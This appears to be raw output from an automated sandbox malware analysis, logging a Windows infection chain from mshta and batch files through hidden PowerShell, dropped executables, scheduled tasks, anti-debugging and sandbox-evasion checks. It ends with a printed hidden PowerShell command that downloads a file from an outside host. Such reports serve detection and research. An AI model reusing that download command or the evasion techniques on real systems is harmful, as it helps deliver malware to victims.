Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_38-105387

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2993	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2541	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 932	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3545	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5460
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1553
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Window / User API: threadDelayed 1355
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Window / User API: threadDelayed 8142
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Window / User API: foregroundWindowGot 1769

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

API coverage: 4.0 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7560	Thread sleep count: 2993 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep count: 2541 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep count: 932 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep count: 3545 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8444	Thread sleep count: 5460 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8444	Thread sleep count: 1553 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8480	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8792	Thread sleep count: 88 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 8436	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 8420	Thread sleep time: -4065000s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 8420	Thread sleep time: -24426000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_004062D5 FindFirstFileW,FindClose,	12_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00402E18 FindFirstFileW,	12_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	12_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00B7A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00B7A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00B6E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00B7A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B766DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00B766DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B3C622 FindFirstFileExW,	38_2_00B3C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00B773D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B77333 FindFirstFileW,FindClose,	38_2_00B77333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00B6D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00B6DC54

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B05FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

38_2_00B05FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: mshta.exe, 00000000.00000002.1836002063.000000000A178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829402803.000000000A1A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1836002063.000000000A1A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1818732974.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829402803.000000000A176000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819031264.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834935908.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819440411.000000000A175000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819440411.000000000A1A8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B7F4FF BlockInput,

38_2_00B7F4FF

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

38_2_00B0338B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

12_2_004062FC

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B25058 mov eax, dword ptr fs:[00000030h]

38_2_00B25058

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B620AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

38_2_00B620AA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B32992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00B32992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B20BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00B20BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B20D45 SetUnhandledExceptionFilter,	38_2_00B20D45
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B20F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00B20F91

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

38_2_00B61B4D

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

38_2_00B0338B

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B6BBED SendInput,keybd_event,

38_2_00B6BBED

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B6EC9E mouse_event,

38_2_00B6EC9E

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
